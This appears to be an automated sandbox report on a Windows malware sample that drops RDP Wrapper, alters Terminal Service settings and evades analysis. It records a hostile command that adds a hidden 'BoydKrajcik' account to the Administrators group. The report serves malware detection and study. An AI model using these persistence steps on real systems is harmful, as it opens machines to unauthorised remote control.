                            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile written: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: file.exeStatic file information: File size 2066432 > 1048576
                            Source: file.exeStatic PE information: Raw size of .}wo is bigger than: 0x100000 < 0x1f7a00
                            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: file.exe
                            Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: costura.costura.pdb.compressed source: file.exe
                            Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: RfxVmt.pdb source: file.exe, 00000000.00000002.2500984157.00000000035EC000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.10.dr
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdb source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: RfxVmt.pdbGCTL source: file.exe, 00000000.00000002.2500984157.00000000035EC000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.10.dr
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: file.exe
                            Source: Binary string: C:\DEV\C#\RDPCreator\RDPCreator\obj\Release\RDPCreator.pdb source: file.exe
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdbSHA256v0& source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            Source: Yara matchFile source: file.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.file.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2499189931.0000000000C62000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2500984157.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.2026603249.0000000000D4A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6980, type: MEMORYSTR
                            Source: file.exeStatic PE information: 0xEF5ACDDE [Tue Apr 2 01:46:06 2097 UTC]
                            Source: initial sampleStatic PE information: section where entry point is pointing to: .}wo
                            Source: file.exeStatic PE information: section name: .T"G
                            Source: file.exeStatic PE information: section name: .}wo
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0576915C push cs; retf 0_2_0576915D
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_004430DC push 00443161h; ret 10_2_00443159
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00439674 push ecx; mov dword ptr [esp], ecx10_2_00439675
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00420164 push 004201DAh; ret 10_2_004201D2
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0040A178 push 0040A1E7h; ret 10_2_0040A1DF
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00437134 push 00437201h; ret 10_2_004371F9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00443188 push 00443230h; ret 10_2_00443228
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0043421C push ecx; mov dword ptr [esp], edx10_2_0043421E
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0044323C push 004432C7h; ret 10_2_004432BF
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00437298 push 0043732Eh; ret 10_2_00437326
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00437360 push 004373ADh; ret 10_2_004373A5
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0043A3F8 push 0043A450h; ret 10_2_0043A448
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_004176D4 push 00417879h; ret 10_2_00417871
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00421998 push 004219E5h; ret 10_2_004219DD
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0042AA70 push ecx; mov dword ptr [esp], edx10_2_0042AA75
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0040CA10 push eax; retf 0040h10_2_0040CA11
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0042AAB4 push ecx; mov dword ptr [esp], edx10_2_0042AAB9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00415C58 push ecx; mov dword ptr [esp], edx10_2_00415C5D
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0040EC80 push ecx; mov dword ptr [esp], ecx10_2_0040EC85
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00404E0C push eax; ret 10_2_00404E48
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0043FE8C push 0043FEE0h; ret 10_2_0043FED8

                            Persistence and Installation Behavior

                            barindex
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" BoydKrajcik /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" BoydKrajcik /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Windows\System32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\WdfJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\ParametersJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0043B58C OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,10_2_0043B58C
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size FROM Win32_DiskDrive
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 32D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 3220000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 5770000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 7770000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: OpenSCManagerW,GetLastError,EnumServicesStatusExW,GetLastError,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,GetLastError,CloseServiceHandle,10_2_0043B7D4
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2377Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 7549Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Users\user\Desktop\file.exe TID: 6300Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 4836Thread sleep count: 2377 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 4836Thread sleep count: 7549 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_004092D8 FindFirstFileW,FindClose,10_2_004092D8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0040F73C FindFirstFileW,FindClose,10_2_0040F73C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,10_2_00408EB9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_00409D02 GetSystemInfo,10_2_00409D02
